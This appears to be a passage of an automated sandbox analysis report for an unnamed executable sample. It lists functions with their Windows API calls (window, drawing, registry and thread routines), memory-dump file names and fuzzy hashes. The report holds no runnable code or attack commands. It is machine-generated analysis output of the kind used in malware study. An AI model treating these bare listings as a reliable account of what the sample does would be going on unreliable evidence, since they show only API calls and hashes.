SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015,?), ref: 0043228B
ScrollWindow.USER32(?,?,?,?,?), ref: 004322A5

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window$ClientScreen$RectScrollVisible
String ID:
API String ID: 1714389229-0
Opcode ID: 89b6f9baf395b08269d687469b93d4691ffc353ba4adacd6aa0e3ff414d6ecb4
Instruction ID: 5a53ef7bcb6d651431baf3782cf7a637b81a2b0ebef421aedc8e1a5a0a472a54
Opcode Fuzzy Hash: 89b6f9baf395b08269d687469b93d4691ffc353ba4adacd6aa0e3ff414d6ecb4
Instruction Fuzzy Hash: FF215B35600619AFDF218F54DC08EBF7BB9FB88715F00842AF90596261E774EC21CB54

Function 00449B00 Relevance: 7.6, APIs: 5, Instructions: 69registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00449B05
RegOpenKeyA.ADVAPI32(?,?,?), ref: 00449B1E
RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 00449B47
RegDeleteKeyA.ADVAPI32(?,?), ref: 00449BB0
RegCloseKey.ADVAPI32(?), ref: 00449BBB

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CloseDeleteEnumH_prologOpen
String ID:
API String ID: 3131381098-0
Opcode ID: b524d806a8a8226f5ffe64c7d0fc1acad4a15aec5219538dad4523ba3edde6f2
Instruction ID: f1711f72ba13d58bffffbf0ffb32389e8bbb1cfb173231a4caec1aa85f83226e
Opcode Fuzzy Hash: b524d806a8a8226f5ffe64c7d0fc1acad4a15aec5219538dad4523ba3edde6f2
Instruction Fuzzy Hash: C2217C32C0016AABDF21DB94DC41AFFBB78FF05354F0141A6E951A72A1C7349E44DB94

Function 0044604B Relevance: 7.6, APIs: 5, Instructions: 68windowCOMMON

Download Yara Rule

APIs

SetFocus.USER32(00000000,00000000), ref: 00446067
GetParent.USER32(?), ref: 00446075
GetActiveWindow.USER32 ref: 004460C1
SendMessageA.USER32(?,00000006,00000001,00000000), ref: 004460D2
SendMessageA.USER32(?,00000086,00000001,00000000), ref: 004460E7

Part of subcall function 00433955: EnableWindow.USER32(?,?), ref: 00433963

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: MessageSendWindow$ActiveEnableFocusParent
String ID:
API String ID: 3951091596-0
Opcode ID: 3d53444c90dff63ffee1f5910845a97f5895adafd42e4e3623eee19a3a433458
Instruction ID: 5673615c3ea81d2f0a4b94e716d146e0ca65c82f4c530a0880636225ebd89c16
Opcode Fuzzy Hash: 3d53444c90dff63ffee1f5910845a97f5895adafd42e4e3623eee19a3a433458
Instruction Fuzzy Hash: B811D3712007009BE7309F65DC88B2B77E9AF46715F12462EF6869A2D2CB79AC40870E

Function 00446101 Relevance: 7.6, APIs: 5, Instructions: 65windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00433753: GetWindowLongA.USER32(?,000000F0), ref: 0043375F

SendMessageA.USER32(?,00000086,00000001,00000000), ref: 00446157
SendMessageA.USER32(?,00000086,00000000,00000000), ref: 0044616B
GetDesktopWindow.USER32 ref: 0044616F
GetWindow.USER32(00000000), ref: 0044617C
SendMessageA.USER32(00000000,0000036D,?,00000000), ref: 0044619D

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: MessageSendWindow$DesktopLong
String ID:
API String ID: 2272707703-0
Opcode ID: fb7c0828918217cef8807b0c2d604bbafa39549e276f42536ae88de2fba4f711
Instruction ID: db9ec3f9ee440c7447606ea4cf66986b61443c5de84ac64ef540d90fcbccb865
Opcode Fuzzy Hash: fb7c0828918217cef8807b0c2d604bbafa39549e276f42536ae88de2fba4f711
Instruction Fuzzy Hash: C41159312407113BF7321A218C12F2FBA459F47B55F16412AF6401A2E3CE59DC01869F

Function 0040B460 Relevance: 7.6, APIs: 5, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0040B4A6
DrawMenuBar.USER32(00000000), ref: 0040B4B1
SetLastError.KERNEL32(00000000), ref: 0040B4C0
SetWindowLongA.USER32(?,000000F0), ref: 0040B4E3
SetWindowLongA.USER32(?,000000EC,?), ref: 0040B4F1

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: LongWindow$DrawErrorLastMenuParent
String ID:
API String ID: 1449420595-0
Opcode ID: b6d683636717737aaf8776508bad93e961e86c7c3116b5e00f55b1017d33e8a9
Instruction ID: d45eadf145e225a0b9ebe08411ec0afb7d57ec454765db5f8276dd9b36fbb16d
Opcode Fuzzy Hash: b6d683636717737aaf8776508bad93e961e86c7c3116b5e00f55b1017d33e8a9
Instruction Fuzzy Hash: E811C1712047002BD220AB659C49F3BB6A8EF94714F044A2EF982A72D2C77CED4187EC

Function 0044B71C Relevance: 7.6, APIs: 5, Instructions: 63registrystringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000), ref: 0044B734
RegOpenKeyA.ADVAPI32(80000000,00000000,?), ref: 0044B755
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 0044B771
RegCloseKey.ADVAPI32(?), ref: 0044B781
RegDeleteKeyA.ADVAPI32(80000000,00000000), ref: 0044B78D

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CloseDeleteEnumOpenlstrlen
String ID:
API String ID: 160701936-0
Opcode ID: e0a8101a842eca82d7da0726a07a0d3defc0dd8528af8653a4101cd648258986
Instruction ID: b761bf409e3429cbe8e8378972b557e31fa9f7291b8c778469a00303bf8125cf
Opcode Fuzzy Hash: e0a8101a842eca82d7da0726a07a0d3defc0dd8528af8653a4101cd648258986
Instruction Fuzzy Hash: AD0161322016147EF7212B61EC99FFB3B6CDF517AAF10003AF904C8091EBA8DD8245AD

Function 00448065 Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

GetMapMode.GDI32(?,?,?,?,?,?,004148E4,?,00000000,?,?,?,?,?,?,?), ref: 00448075
GetDeviceCaps.GDI32(?,00000058), ref: 004480AF
GetDeviceCaps.GDI32(?,0000005A), ref: 004480B8

Part of subcall function 00438B0F: GetWindowExtEx.GDI32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 00438B20
Part of subcall function 00438B0F: GetViewportExtEx.GDI32(?,?,?,?,?,?,?,00000000,00000000), ref: 00438B2D
Part of subcall function 00438B0F: MulDiv.KERNEL32(?,00000000,00000000), ref: 00438B52
Part of subcall function 00438B0F: MulDiv.KERNEL32(00000002,00000000,00000000), ref: 00438B6D

MulDiv.KERNEL32(?,000009EC,00000060), ref: 004480DC
MulDiv.KERNEL32(00000002,000009EC,?), ref: 004480E7

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CapsDevice$ModeViewportWindow
String ID:
API String ID: 2598972148-0
Opcode ID: dd96e22100dfa93b67ee38670ca722714832148f0f86229c2da9e7fc5ce7beda
Instruction ID: c3000c36b0a4cfcd82065a020ca040506e45e036f45b60e29bbf7084e53bae44
Opcode Fuzzy Hash: dd96e22100dfa93b67ee38670ca722714832148f0f86229c2da9e7fc5ce7beda
Instruction Fuzzy Hash: 9B11AC71600A04AFEB21AF59CC44C2EBBE9EF88751B12402EF94697361DBB2AC41CF55

Function 004480F3 Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

GetMapMode.GDI32(?,00000000,?,?,?,?,00414918,?,?,?,?,?,?,00000000,00000000), ref: 00448103
GetDeviceCaps.GDI32(?,00000058), ref: 0044813D
GetDeviceCaps.GDI32(?,0000005A), ref: 00448146

Part of subcall function 00438AA6: GetWindowExtEx.GDI32(?,00414918,00000000,?,?,?,00414918,?,?,?,?,?,?,00000000,00000000), ref: 00438AB7
Part of subcall function 00438AA6: GetViewportExtEx.GDI32(?,?,?,00414918,?,?,?,?,?,?,00000000,00000000), ref: 00438AC4
Part of subcall function 00438AA6: MulDiv.KERNEL32(00414918,00000000,00000000), ref: 00438AE9
Part of subcall function 00438AA6: MulDiv.KERNEL32(46892C46,00000000,00000000), ref: 00438B04

MulDiv.KERNEL32(00414918,00000060,000009EC), ref: 0044816A
MulDiv.KERNEL32(46892C46,?,000009EC), ref: 00448175

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CapsDevice$ModeViewportWindow
String ID:
API String ID: 2598972148-0
Opcode ID: 57f81895dfae2b9d25cc4b64127cb6cd0e2e07dd2978c01cd0c286df586b81ef
Instruction ID: 695f9fdec1947423f405175aaa9be44b7dff7c24dc14e02b7496eb67d8368267
Opcode Fuzzy Hash: 57f81895dfae2b9d25cc4b64127cb6cd0e2e07dd2978c01cd0c286df586b81ef
Instruction Fuzzy Hash: AD11A031600600AFE7116F55CC44C2EBBB9EF88751B11442FF98697360DB75EC428F54

Function 00446B2A Relevance: 7.6, APIs: 5, Instructions: 57windowCOMMON

Download Yara Rule

APIs

GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 00446B8C
GlobalAddAtomA.KERNEL32(?), ref: 00446B9B
GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 00446BB1
GlobalAddAtomA.KERNEL32(?), ref: 00446BBA
SendMessageA.USER32(?,000003E4,?,?), ref: 00446BDE

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: AtomGlobal$Name$MessageSend
String ID:
API String ID: 1515195355-0
Opcode ID: 30ad1438fedfa64c0aa3a4ac41e38fe9f0e4b79a563762d9aefc3c07efdf8679
Instruction ID: 4961bf111cad7e5f0c2664609a8e261c763bcf87bcc4f4366d2516b1338431fc
Opcode Fuzzy Hash: 30ad1438fedfa64c0aa3a4ac41e38fe9f0e4b79a563762d9aefc3c07efdf8679
Instruction Fuzzy Hash: A6119135904318ABEB20EB68CC44BEBB3BDEF04700F018456E999D7151E7B8EAC0CB65

Function 00431407 Relevance: 7.6, APIs: 5, Instructions: 52stringregistryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0043140C
GetClassInfoA.USER32(?,?,?), ref: 00431427
RegisterClassA.USER32(?), ref: 00431432
lstrcatA.KERNEL32(00000034,?,00000001), ref: 00431469
lstrcatA.KERNEL32(00000034,?), ref: 00431477

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Classlstrcat$H_prologInfoRegister
String ID:
API String ID: 106226465-0
Opcode ID: 51c2ef1aabc2e10a04099d7c7a2ad480b6e0375543496d98f831890bf1a0064b
Instruction ID: a5aa64766f9e4c1e45ee8e25ad90e0ad1afa33c1b3365979bf14dba858346819
Opcode Fuzzy Hash: 51c2ef1aabc2e10a04099d7c7a2ad480b6e0375543496d98f831890bf1a0064b
Instruction Fuzzy Hash: CE110832500714BFDB10AFA59C01BDE7BB8EF15719F00851BF806A7162C779D604C769

Function 0041317D Relevance: 7.5, APIs: 5, Instructions: 49memorystringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 0041319D
SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 004131A5
lstrlenA.KERNEL32(?), ref: 004131AD
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000001), ref: 004131D3
SysAllocString.OLEAUT32 ref: 004131DA

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: AllocByteStringlstrlen$CharMultiWide
String ID:
API String ID: 1909028937-0
Opcode ID: 04e454982b0517ccb1b25f755244bd955dc57e6ba1b24b26c189a153ab6fdb00
Instruction ID: 023b9500b34c11f649aa9729b8c5fbb8b4837780c7c0ded5a7d2ebc7c76d7cb3
Opcode Fuzzy Hash: 04e454982b0517ccb1b25f755244bd955dc57e6ba1b24b26c189a153ab6fdb00
Instruction Fuzzy Hash: 4401D432A00714BBDB106F62DC44ABBB7ACFF063A77004126FC15C7201D779CA8087AA

Function 0044F2FB Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 0044F314
ScreenToClient.USER32(?,?), ref: 0044F321
LoadCursorA.USER32(?,00007902), ref: 0044F35C
SetCursor.USER32(00000000), ref: 0044F376

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Cursor$ClientLoadScreen
String ID:
API String ID: 120721131-0
Opcode ID: 314ed9a7f23aae13ecd85f1e88f00a84b191d763f31413bad29ccfc1c279df3a
Instruction ID: c2cf84dbb2ad7c450e9b8adad5b1d60858d902877f83720a95366fd68ac38d7d
Opcode Fuzzy Hash: 314ed9a7f23aae13ecd85f1e88f00a84b191d763f31413bad29ccfc1c279df3a
Instruction Fuzzy Hash: 4C015271900309FFEB209FA1CC09EAE77ADEF04312F00843AF945D6151E678E944CB68

Function 0043F057 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 0043F05F

Part of subcall function 00448181: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,5!D), ref: 004481C0
Part of subcall function 00448181: CreatePatternBrush.GDI32(00000000), ref: 004481CD
Part of subcall function 00448181: DeleteObject.GDI32(00000000), ref: 004481D9

SelectObject.GDI32(?,?), ref: 0043F07E
PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 0043F0A6
SelectObject.GDI32(?,00000000), ref: 0043F0B5
ReleaseDC.USER32(?,?), ref: 0043F0C1

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Object$CreateSelect$BitmapBrushDeletePatternRelease
String ID:
API String ID: 2474928807-0
Opcode ID: 2e6fa30940719b44746aced73142d1cf7750628f017cbb2c827dbf08e82181b2
Instruction ID: 61c8f4e2ad1b7a1d836446ff20ad1cd620ed12abeb7c43a11ee496eac7a246a4
Opcode Fuzzy Hash: 2e6fa30940719b44746aced73142d1cf7750628f017cbb2c827dbf08e82181b2
Instruction Fuzzy Hash: 01017876600B04AFDB24AFA5DD0CC2BBFAAEB887023058039F51587232CB32DC10DB24

Function 0042CEDE Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32(?,?,?,00000000,0042CE07,?,?,?,0044F4BC,?,?,?,?,00402D9A,?), ref: 0042CEF2
GlobalLock.KERNEL32(?,?,00000000,0042CE07,?,?,?,0044F4BC,?,?,?,?,00402D9A,?), ref: 0042CEFF
CreateDCA.GDI32(?,?,?,00000000), ref: 0042CF22
GlobalUnlock.KERNEL32(?,?,00000000,0042CE07,?,?,?,0044F4BC,?,?,?,?,00402D9A,?), ref: 0042CF34
GlobalUnlock.KERNEL32(?,?,00000000,0042CE07,?,?,?,0044F4BC,?,?,?,?,00402D9A,?), ref: 0042CF3B

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Global$LockUnlock$Create
String ID:
API String ID: 2536725124-0
Opcode ID: 4b0dcee9a6eafc024e314158a48227cb319441d260aa9054aa328b8b4f1e031b
Instruction ID: 653a1d14eefe926f551c881d84c38a8279065db3fca76b5feedc5bae105d6b37
Opcode Fuzzy Hash: 4b0dcee9a6eafc024e314158a48227cb319441d260aa9054aa328b8b4f1e031b
Instruction Fuzzy Hash: 18F0A422304731ABC2209B29AD84B3BBBDDAF94A91B160836F944D3240D668DC04D6B8

Function 00445C8E Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32(?,?,00000367,00000367,00000003), ref: 00445CAF
PostMessageA.USER32(?,00000367,00000000,00000000), ref: 00445CC5
GetCapture.USER32 ref: 00445CC7
ReleaseCapture.USER32 ref: 00445CD2
PostMessageA.USER32(?,0000036A,00000000,00000000), ref: 00445CEF

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Message$CapturePost$PeekRelease
String ID:
API String ID: 1125932295-0
Opcode ID: 28a59ea569b020a22b12882e6823dec24139a50eb36530c1e8a0b2aa311cf702
Instruction ID: 926a44ca1ac2ba0137f555d76552f5a6fc72d72cf89c93eadff3aa29dbc07395
Opcode Fuzzy Hash: 28a59ea569b020a22b12882e6823dec24139a50eb36530c1e8a0b2aa311cf702
Instruction Fuzzy Hash: E2F0A431100F08BFD7216F16EC48D2BBFBDFB85749B41456EF44192652D736E5058A68

Function 0041E433 Relevance: 7.5, APIs: 5, Instructions: 38threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,0000000C,0041B4BA,00000000,0000000C,?,0041B3B6,00000000,00000000,?,?,0041B1E7,00000000,00000001), ref: 0041E435
TlsGetValue.KERNEL32(?,0041B3B6,00000000,00000000,?,?,0041B1E7,00000000,00000001), ref: 0041E443
SetLastError.KERNEL32(00000000,?,0041B3B6,00000000,00000000,?,?,0041B1E7,00000000,00000001), ref: 0041E48F

Part of subcall function 0041CA76: HeapAlloc.KERNEL32(00000008,?,?,?,?,0041E3EB,00000001,00000074,?,0041AAD5), ref: 0041CACB

TlsSetValue.KERNEL32(00000000,?,0041B3B6,00000000,00000000,?,?,0041B1E7,00000000,00000001), ref: 0041E467
GetCurrentThreadId.KERNEL32 ref: 0041E478

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ErrorLastValue$AllocCurrentHeapThread
String ID:
API String ID: 2020098873-0
